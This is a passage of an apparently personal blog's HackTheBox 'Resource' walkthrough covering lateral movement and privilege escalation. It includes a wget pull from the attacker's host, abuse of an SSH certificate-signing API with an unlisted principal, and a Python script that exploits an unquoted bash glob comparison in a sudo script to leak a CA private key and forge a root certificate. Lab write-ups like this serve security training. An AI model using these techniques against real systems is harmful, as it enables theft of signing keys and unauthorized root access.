</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic>## htb machine</span>
</span></span><span style=display:flex><span>wget http://10.10.10.1:8000/ -r -nd <span style=color:#fe8019>&amp;&amp;</span> rm index.html
</span></span></code></pre></div><p>Now we can login to <code>zzinter</code> using the ssh private key:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh zzinter@10.10.11.27 -i ctf -o CertificateFile<span style=color:#fe8019>=</span>ctf-cert.pub
</span></span></code></pre></div><figure><img src=/img/resource/Pasted%20image%2020240809200037.webp></figure><hr><h2 id=privilege-escalation><a href=#privilege-escalation class=anchor-head aria-label=Anchor></a>Privilege Escalation</h2><h3 id=local-enumeration-1><a href=#local-enumeration-1 class=anchor-head aria-label=Anchor></a>Local Enumeration</h3><p>There&rsquo;s a <code>sign_key_api.sh</code> file in the home</p><figure><img src=/img/resource/Pasted%20image%2020240809200324.webp></figure><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#8ec07c>#!/bin/bash
</span></span></span><span style=display:flex><span><span style=color:#8ec07c></span>
</span></span><span style=display:flex><span>usage <span style=color:#fe8019>()</span> <span style=color:#fe8019>{</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Usage: </span>$0<span style=color:#b8bb26> &lt;public_key_file&gt; &lt;username&gt; &lt;principal&gt;&#34;</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>exit</span> <span style=color:#d3869b>1</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>}</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> <span style=color:#b8bb26>&#34;</span>$#<span style=color:#b8bb26>&#34;</span> -ne <span style=color:#d3869b>3</span> <span style=color:#fe8019>]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>public_key_file<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$1<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>username<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$2<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>principal_str<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$3<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>supported_principals<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;webserver,analytics,support,security&#34;</span>
</span></span><span style=display:flex><span>IFS<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#39;,&#39;</span> <span style=color:#fabd2f>read</span> -ra principal <span style=color:#fe8019>&lt;&lt;&lt;</span> <span style=color:#b8bb26>&#34;</span>$principal_str<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>for</span> word in <span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>${</span>principal[@]<span style=color:#b8bb26>}</span><span style=color:#b8bb26>&#34;</span>; <span style=color:#fe8019>do</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> ! <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;</span>$supported_principals<span style=color:#b8bb26>&#34;</span> | grep -qw <span style=color:#b8bb26>&#34;</span>$word<span style=color:#b8bb26>&#34;</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: &#39;</span>$word<span style=color:#b8bb26>&#39; is not a supported principal.&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Choose from:&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    webserver - external web servers - webadmin user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    analytics - analytics team databases - analytics user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    support - IT support server - support user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    security - SOC servers - support user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span>
</span></span><span style=display:flex><span>        usage
</span></span><span style=display:flex><span>    <span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>done</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> ! -f <span style=color:#b8bb26>&#34;</span>$public_key_file<span style=color:#b8bb26>&#34;</span> <span style=color:#fe8019>]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: Public key file &#39;</span>$public_key_file<span style=color:#b8bb26>&#39; not found.&#34;</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>public_key<span style=color:#fe8019>=</span><span style=color:#fe8019>$(</span>cat $public_key_file<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>curl -s signserv.ssg.htb/v1/sign -d <span style=color:#b8bb26>&#39;{&#34;pubkey&#34;: &#34;&#39;</span><span style=color:#b8bb26>&#34;</span>$public_key<span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>&#39;&#34;, &#34;username&#34;: &#34;&#39;</span><span style=color:#b8bb26>&#34;</span>$username<span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>&#39;&#34;, &#34;principals&#34;: &#34;&#39;</span><span style=color:#b8bb26>&#34;</span>$principal<span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>&#39;&#34;}&#39;</span> -H <span style=color:#b8bb26>&#34;Content-Type: application/json&#34;</span> -H <span style=color:#b8bb26>&#34;Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE&#34;</span>
</span></span></code></pre></div><p>This script calls and api to sign ssh public keys. We can run the script and give it a public key, username, and a principal value (from <code>webserver</code>, <code>analytics</code>, <code>support</code>, and <code>security</code>). This api might be trying to sign the given public key with a CA certificate present in the host machine. To sign the pubilc key, we have to figure out valid username and principal combination. I first checked user <code>root</code> and all of he mentioned principals. But none of them worked, then after some more trial and error I found a valid combo <code>support:support</code>.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh-keygen -t rsa -f ctf-support
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic>## copy the pub file into the htb machine and run the script</span>
</span></span><span style=display:flex><span>bash sign_key_api.sh ./ctf-support.pub support support
</span></span></code></pre></div><p>This will generate a <code>cert</code> file and we can login to ssh using this cert file and the private key. Note that there&rsquo;s to ssh port open <code>22</code> and <code>2222</code>. The <code>22</code> port is for the docker and maybe the <code>2222</code> is for the host.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh support@10.10.11.27 -p <span style=color:#d3869b>2222</span> -i ctf-support -o CertificateFile<span style=color:#fe8019>=</span>support.cert
</span></span></code></pre></div><figure><img src=/img/resource/Pasted%20image%2020240809202958.webp></figure><h3 id=privilege-escalation-vector><a href=#privilege-escalation-vector class=anchor-head aria-label=Anchor></a>Privilege Escalation vector</h3><p>I checked the other users in the machine</p><figure><img src=/img/resource/Pasted%20image%2020240809205216.webp></figure><p>There&rsquo;s a zzinter user in this machine. We can try generating another <code>cert</code> file using the previous script for this user. I tried all 4 principals mentioned in the script but none of them worked.
We can look inside <code>/etc/ssh</code> to know how this is configured. I recomend you to check this blog to learn more about CAs and Principals <a href=https://dmuth.medium.com/ssh-at-scale-cas-and-principals-b27edca3a5d>https://dmuth.medium.com/ssh-at-scale-cas-and-principals-b27edca3a5d</a></p><figure><img src=/img/resource/Pasted%20image%2020240809205819.webp></figure><p>root login is enabled in the <code>sshd_config</code> file. If we check the <code>/etc/ssh/sshd_conf.d/sshcerts.conf</code> we can see where the principals are stored</p><figure><img src=/img/resource/Pasted%20image%2020240809205926.webp></figure><p>As we can see there are 2 more principals that were not mentioned in the previous script that used to sign the ssh public key.</p><figure><img src=/img/resource/Pasted%20image%2020240809210224.webp></figure><p>Let&rsquo;s copy the previous script, ad these two new principals to the script and try login as root.</p><figure><img src=/img/resource/Pasted%20image%2020241129222723.webp></figure><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>ssh-keygen -t rsa -f ctf-root
</span></span><span style=display:flex><span>bash sign_key_api.sh ./ctf-root.pub root root_user
</span></span></code></pre></div><figure><img src=/img/resource/Pasted%20image%2020241129222955.webp></figure><p>We can&rsquo;t sign the key for root user.</p><p>Let&rsquo;s try zzinter</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh-keygen -t rsa -f ctf-zzinter
</span></span><span style=display:flex><span>bash sign_key_api.sh ./ctf-zzinter.pub zzinter zzinter_temp
</span></span></code></pre></div><figure><img src=/img/resource/Pasted%20image%2020241129223252.webp></figure><p>We got an output, and if we tried to log in using this cert file as user zzinter</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh zzinter@10.10.11.27 -p <span style=color:#d3869b>2222</span> -i ctf-zzinter -o CertificateFile<span style=color:#fe8019>=</span>zzinter.cert
</span></span></code></pre></div><p>We logged in as zzinter</p><figure><img src=/img/resource/Pasted%20image%2020240809210913.webp></figure><p>User zzinter can run <code>/opt/sign_key.sh</code> with sudo privileges</p><figure><img src=/img/resource/Pasted%20image%2020240809211043.webp></figure><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#8ec07c>#!/bin/bash
</span></span></span><span style=display:flex><span><span style=color:#8ec07c></span>
</span></span><span style=display:flex><span>usage <span style=color:#fe8019>()</span> <span style=color:#fe8019>{</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Usage: </span>$0<span style=color:#b8bb26> &lt;ca_file&gt; &lt;public_key_file&gt; &lt;username&gt; &lt;principal&gt; &lt;serial&gt;&#34;</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>exit</span> <span style=color:#d3869b>1</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>}</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> <span style=color:#b8bb26>&#34;</span>$#<span style=color:#b8bb26>&#34;</span> -ne <span style=color:#d3869b>5</span> <span style=color:#fe8019>]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>ca_file<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$1<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>public_key_file<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$2<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>username<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$3<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>principal<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$4<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>serial<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;</span>$5<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> ! -f <span style=color:#b8bb26>&#34;</span>$ca_file<span style=color:#b8bb26>&#34;</span> <span style=color:#fe8019>]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: CA file &#39;</span>$ca_file<span style=color:#b8bb26>&#39; not found.&#34;</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[[</span> $ca <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;/etc/ssh/ca-it&#34;</span> <span style=color:#fe8019>]]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: Use API for signing with this CA.&#34;</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>itca<span style=color:#fe8019>=</span><span style=color:#fe8019>$(</span>cat /etc/ssh/ca-it<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>ca<span style=color:#fe8019>=</span><span style=color:#fe8019>$(</span>cat <span style=color:#b8bb26>&#34;</span>$ca_file<span style=color:#b8bb26>&#34;</span><span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[[</span> $itca <span style=color:#fe8019>==</span> $ca <span style=color:#fe8019>]]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: Use API for signing with this CA.&#34;</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> ! -f <span style=color:#b8bb26>&#34;</span>$public_key_file<span style=color:#b8bb26>&#34;</span> <span style=color:#fe8019>]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: Public key file &#39;</span>$public_key_file<span style=color:#b8bb26>&#39; not found.&#34;</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>supported_principals<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;webserver,analytics,support,security&#34;</span>
</span></span><span style=display:flex><span>IFS<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#39;,&#39;</span> <span style=color:#fabd2f>read</span> -ra principal <span style=color:#fe8019>&lt;&lt;&lt;</span> <span style=color:#b8bb26>&#34;</span>$principal_str<span style=color:#b8bb26>&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>for</span> word in <span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>${</span>principal[@]<span style=color:#b8bb26>}</span><span style=color:#b8bb26>&#34;</span>; <span style=color:#fe8019>do</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> ! <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;</span>$supported_principals<span style=color:#b8bb26>&#34;</span> | grep -qw <span style=color:#b8bb26>&#34;</span>$word<span style=color:#b8bb26>&#34;</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: &#39;</span>$word<span style=color:#b8bb26>&#39; is not a supported principal.&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Choose from:&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    webserver - external web servers - webadmin user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    analytics - analytics team databases - analytics user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    support - IT support server - support user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;    security - SOC servers - support user&#34;</span>
</span></span><span style=display:flex><span>        <span style=color:#fabd2f>echo</span>
</span></span><span style=display:flex><span>        usage
</span></span><span style=display:flex><span>    <span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>done</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> ! <span style=color:#fe8019>[[</span> $serial <span style=color:#fe8019>=</span>~ ^<span style=color:#fe8019>[</span>0-9<span style=color:#fe8019>]</span>+$ <span style=color:#fe8019>]]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>    <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Error: &#39;</span>$serial<span style=color:#b8bb26>&#39; is not a number.&#34;</span>
</span></span><span style=display:flex><span>    usage
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>ssh-keygen -s <span style=color:#b8bb26>&#34;</span>$ca_file<span style=color:#b8bb26>&#34;</span> -z <span style=color:#b8bb26>&#34;</span>$serial<span style=color:#b8bb26>&#34;</span> -I <span style=color:#b8bb26>&#34;</span>$username<span style=color:#b8bb26>&#34;</span> -V -1w:forever -n <span style=color:#b8bb26>&#34;</span>$principals<span style=color:#b8bb26>&#34;</span> <span style=color:#b8bb26>&#34;</span>$public_key_name<span style=color:#b8bb26>&#34;</span>
</span></span></code></pre></div><p>This is similar to the previous script, but in here instead of using API, we can directly provide the <code>ca_file</code>. There&rsquo;s an if statement that checks if the provided <code>ca_file</code> is <code>/etc/ssh/ca-it</code>, if it is true then it will print the usage and exit.</p><figure><img src=/img/resource/Pasted%20image%2020241129224415.webp></figure><p>The one thing to notice here is that the script first reads the content of both <code>/etc/ssh/ca-it</code> and the file we provide and tries to match the content. And specifically in that line:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[[</span> $itca <span style=color:#fe8019>==</span> $ca <span style=color:#fe8019>]]</span>; <span style=color:#fe8019>then</span>
</span></span></code></pre></div><p>It tries to match the content without surrounding the variables in quotest <code>"</code>, which makes it possible to pattern match. Let&rsquo;s explain that with an example:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>pass<span style=color:#fe8019>=</span>$1
</span></span><span style=display:flex><span>root_pass<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;secretpass&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[[</span> $root_pass <span style=color:#fe8019>==</span> $pass <span style=color:#fe8019>]]</span>; <span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>	<span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Access granted!&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>else</span>
</span></span><span style=display:flex><span>	<span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;Wrong password!&#34;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span></code></pre></div><p>Here when we enter <code>*</code> as the password, the script will match it with the password and we can easily bypass the check.</p><figure><img src=/img/resource/Pasted%20image%2020241129205356.webp></figure><p>In this example th password is hardcoded inside the script. Now what if the script have suid bit set and reads the password from another file which only the root user have permission to. Another thing we can try is exfiltrate the password by exploiting this wilcard matching.
For example we can try to find the first letter by trying all the letter one by one and add <code>*</code> at the end. Since the password here is <code>secretpass</code>, the password <code>a*</code> fails and <code>s*</code> works.</p><figure><img src=/img/resource/Pasted%20image%2020241129205900.webp></figure><p>We can keep doing this until we exfiltrate the whole password using a small script.
The same method can be applied to create a script to leak the content of <code>/etc/ssh/ca-it</code> file.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#fe8019>import</span> string
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> subprocess
</span></span><span style=display:flex><span><span style=color:#fe8019>import</span> os
</span></span><span style=display:flex><span> 
</span></span><span style=display:flex><span>chars <span style=color:#fe8019>=</span> string<span style=color:#fe8019>.</span>ascii_uppercase <span style=color:#fe8019>+</span> string<span style=color:#fe8019>.</span>ascii_lowercase <span style=color:#fe8019>+</span> string<span style=color:#fe8019>.</span>digits <span style=color:#fe8019>+</span> <span style=color:#b8bb26>&#39;+/</span><span style=color:#b8bb26>\n</span><span style=color:#b8bb26>-= &#39;</span>
</span></span><span style=display:flex><span>ca <span style=color:#fe8019>=</span> <span style=color:#b8bb26>&#39;test-ca&#39;</span>
</span></span><span style=display:flex><span> 
</span></span><span style=display:flex><span>leaked_key<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;&#34;&#34;-----BEGIN OPENSSH PRIVATE KEY-----
</span></span></span><span style=display:flex><span><span style=color:#b8bb26>&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span> 
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>is_valid_ca</span>():
</span></span><span style=display:flex><span>    output <span style=color:#fe8019>=</span> subprocess<span style=color:#fe8019>.</span>run(
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>f</span><span style=color:#b8bb26>&#34;sudo /opt/sign_key.sh </span><span style=color:#b8bb26>{</span>ca<span style=color:#b8bb26>}</span><span style=color:#b8bb26> ctf-root.pub root root_user 1337&#34;</span>,
</span></span><span style=display:flex><span>        stdout<span style=color:#fe8019>=</span>subprocess<span style=color:#fe8019>.</span>PIPE,
</span></span><span style=display:flex><span>        stderr<span style=color:#fe8019>=</span>subprocess<span style=color:#fe8019>.</span>PIPE,
</span></span><span style=display:flex><span>        shell<span style=color:#fe8019>=</span><span style=color:#fe8019>True</span>,
</span></span><span style=display:flex><span>    )
</span></span><span style=display:flex><span>    <span style=color:#fe8019>return</span> <span style=color:#b8bb26>&#34;Error: Use API for signing with this CA.&#34;</span> <span style=color:#fe8019>in</span> output<span style=color:#fe8019>.</span>stdout<span style=color:#fe8019>.</span>decode()
</span></span><span style=display:flex><span> 
</span></span><span style=display:flex><span><span style=color:#fe8019>while</span> <span style=color:#fe8019>not</span> leaked_key<span style=color:#fe8019>.</span>endswith(<span style=color:#b8bb26>&#39;-----END OPENSSH PRIVATE KEY----&#39;</span>):
</span></span><span style=display:flex><span>    <span style=color:#fe8019>for</span> s <span style=color:#fe8019>in</span> chars:
</span></span><span style=display:flex><span>        <span style=color:#fe8019>with</span> <span style=color:#fabd2f>open</span>(ca, <span style=color:#b8bb26>&#39;w&#39;</span>) <span style=color:#fe8019>as</span> f:
</span></span><span style=display:flex><span>            f<span style=color:#fe8019>.</span>write(leaked_key <span style=color:#fe8019>+</span> s <span style=color:#fe8019>+</span> <span style=color:#b8bb26>&#39;*&#39;</span>)
</span></span><span style=display:flex><span> 
</span></span><span style=display:flex><span>        <span style=color:#fe8019>if</span> is_valid_ca():
</span></span><span style=display:flex><span>            leaked_key <span style=color:#fe8019>=</span> leaked_key <span style=color:#fe8019>+</span> s
</span></span><span style=display:flex><span>            os<span style=color:#fe8019>.</span>system(<span style=color:#b8bb26>&#39;clear&#39;</span>)
</span></span><span style=display:flex><span>            <span style=color:#fabd2f>print</span>(leaked_key)
</span></span><span style=display:flex><span>            <span style=color:#fe8019>break</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>else</span>:
</span></span><span style=display:flex><span>        <span style=color:#fe8019>break</span>
</span></span><span style=display:flex><span><span style=color:#fabd2f>print</span>(leaked_key) 
</span></span></code></pre></div><p>Now execute the script, it will take some time to leak the entire file content.</p><figure><img src=/img/resource/Pasted%20image%2020241129232152.webp></figure><p>Now let&rsquo;s create an ssh key for root and let&rsquo;s sign it using the CA.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh-keygen -t rsa -f ctf-root
</span></span><span style=display:flex><span>ssh-keygen -s ca-root -I root -n root_user ctf-root.pub
</span></span></code></pre></div><figure><img src=/img/resource/Pasted%20image%2020241129232949.webp></figure><p>Now let&rsquo;s login as root</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ssh root@10.10.11.27 -p <span style=color:#d3869b>2222</span> -i ctf-root -o CertificateFile<span style=color:#fe8019>=</span>ctf-root-cert.pub
</span></span></code></pre></div><figure><img src=/img/resource/Pasted%20image%2020241129233357.webp></figure><h4 id=reference><a href=#reference class=anchor-head aria-label=Anchor></a>Reference:</h4><ul><li><a href=https://www.php.net/manual/en/phar.using.stream.php><code>phar://</code> wrapper</a></li><li><a href=https://rudrasarkar.medium.com/exploiting-phar-stream-wrapper-d2140592c6e7>Exploiting phar stream wrapper</a></li><li><a href=https://en.wikipedia.org/wiki/HAR_(file_format)>HAR</a></li><li><a href=https://www.lorier.net/docs/ssh-ca.html>Certification Authority key</a></li><li><a href=https://dmuth.medium.com/ssh-at-scale-cas-and-principals-b27edca3a5d>SSH at scale CAs and Principals</a></li></ul></div></article></main><aside id=sticky-top><div class=toc-title><p>Resource | HackTheBox</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><ul><li><a href=#overview>Overview</a></li></ul></li><li><a href=#information-gathering>Information Gathering</a></li><li><a href=#enumeration>Enumeration</a><ul><li><a href=#port-80---http-nginx-1180>Port 80 - HTTP (Nginx <code>1.18.0</code>)</a></li></ul></li><li><a href=#exploitation>Exploitation</a><ul><li><a href=#phar-deserialization><code>phar://</code> deserialization</a></li></ul></li><li><a href=#lateral-movement-to-user>Lateral Movement to user</a><ul><li><a href=#local-enumeration>Local Enumeration</a></li><li><a href=#lateral-movement---user-msainristil>Lateral Movement - user msainristil</a></li><li><a href=#lateral-movement---user-zzinter>Lateral Movement - user zzinter</a></li></ul></li><li><a href=#privilege-escalation>Privilege Escalation</a><ul><li><a href=#local-enumeration-1>Local Enumeration</a></li><li><a href=#privilege-escalation-vector>Privilege Escalation vector</a></li></ul></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2024-11-29</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/hack-the-box/><p class=alert-heading>Hack the Box Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/permx/><div class=nav-arrow>Previous in series</div><span class=post-title>PermX | HackTheBox</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/permx/><div class=nav-arrow>Previous</div><span class=post-title>PermX | HackTheBox</span>
</a><a class="post-nav-item post-nav-next" href=https://h4r1337.github.io/posts/boi_android_malware/><div class=nav-arrow>Next</div><span class=post-title>Android Malware Targeting Banking Credentials and SMS Data | Malware Research</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>